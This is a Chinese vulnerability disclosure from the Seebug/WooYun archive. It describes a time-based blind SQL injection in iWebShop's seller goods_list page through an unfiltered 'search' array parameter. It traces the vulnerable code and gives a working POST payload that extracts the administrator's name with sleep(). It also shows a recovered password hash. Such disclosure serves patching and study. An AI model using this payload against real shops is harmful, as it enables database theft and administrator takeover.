Iwebshop最新版注入又一枚

基本字段

漏洞编号：: SSV-95940

披露/发现时间：: 2015-01-28

提交时间：: 2015-01-28

漏洞等级：

漏洞类别：: 其他类型

影响组件：: iWebMall

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-093637

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： Iwebshop最新版注入又一枚 ### 详细说明：看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ [WooYun: iWebShop开源电子商务系统SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2014-087202) ），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。注入一枚：POST /index.php?controller=seller&action=goods_list这个注入藏的相对比较深，在HTML文件中。POST参数中的search作为一个数组传入，search的KEY and VALUE 都过滤不完全，注入成功，文件在/controllers/seller.php的goods_list()方法中看看代码/controllers/seller.php ``` //商品列表 public function goods_list() { $this->redirect('goods_list'); } ``` 这段代码看似直接重向了，并没有什么参数传入，注入点在哪里呢？然后各种跳跳跳，最后一直跟到/views/sysseller/seller/goods_list.html ``` {set:$seller_id = $this->seller['seller_id']} {set:$page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1} {set:$condition = IReq::get('search');$where = '';$searchUrl='';} {if:$condition} {foreach:items=$condition} {set:$searchUrl .='&search['.urlencode($key).']='.urlencode($item)} {if:$item !== ""} {if:$key == "go.store_nums"} {set:$where .= ' and '.$key.$item} {else:} {set:$where .= ' and '.$key.'"'.$item.'"'} {/if} {/if} {/foreach} {/if} ``` condition是这样获得的$condition = IReq::get('search');，去看看IReq::get /lib/core/util/req_class.php ``` public static function get($key, $type=false) { //默认方式 if($type==false) { if(isset($_GET[$key])) return $_GET[$key]; else if(isset($_POST[$key])) return $_POST[$key]; else return null; } //get方式 else if($type=='get' && isset($_GET[$key])) return $_GET[$key]; //post方式 else if($type=='post' && isset($_POST[$key])) return $_POST[$key]; //无匹配 else return null; } ``` 没有经过任何处理，直接把GET、POST的内容传入了测试方法：申请开店后，登录，添加一件商品，然后发送下面的post包即可。 Payload:POST提交 ``` search[1%3d-1/**/or(select/**/if(ord(mid((select/**/admin_name/**/from/**/iwebshop_admin/**/limit /**/0,1),1,1))%3d97,sleep(1),0))#]=test_goods_list ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟1s左右，如下图 [<img src="https://images.seebug.org/upload/201501/23235439869aa5a2acedb0715e215185d2fa32a3.jpg" alt="猜测失败副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/23235439869aa5a2acedb0715e215185d2fa32a3.jpg) 若正确，延迟4s左右（与你添加的商品数量有关，可以只给自己的店铺添加一件商品）如下图 [<img src="https://images.seebug.org/upload/201501/2323545440c1aa8df4196e5819c24996ebc22192.jpg" alt="猜测成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2323545440c1aa8df4196e5819c24996ebc22192.jpg) 按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：admin，密码为： f6fdffe48c908deb0f4c3bd36c032e72 ### 漏洞证明：见详细说明

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-093637

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Iwebshop最新版注入又一枚

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定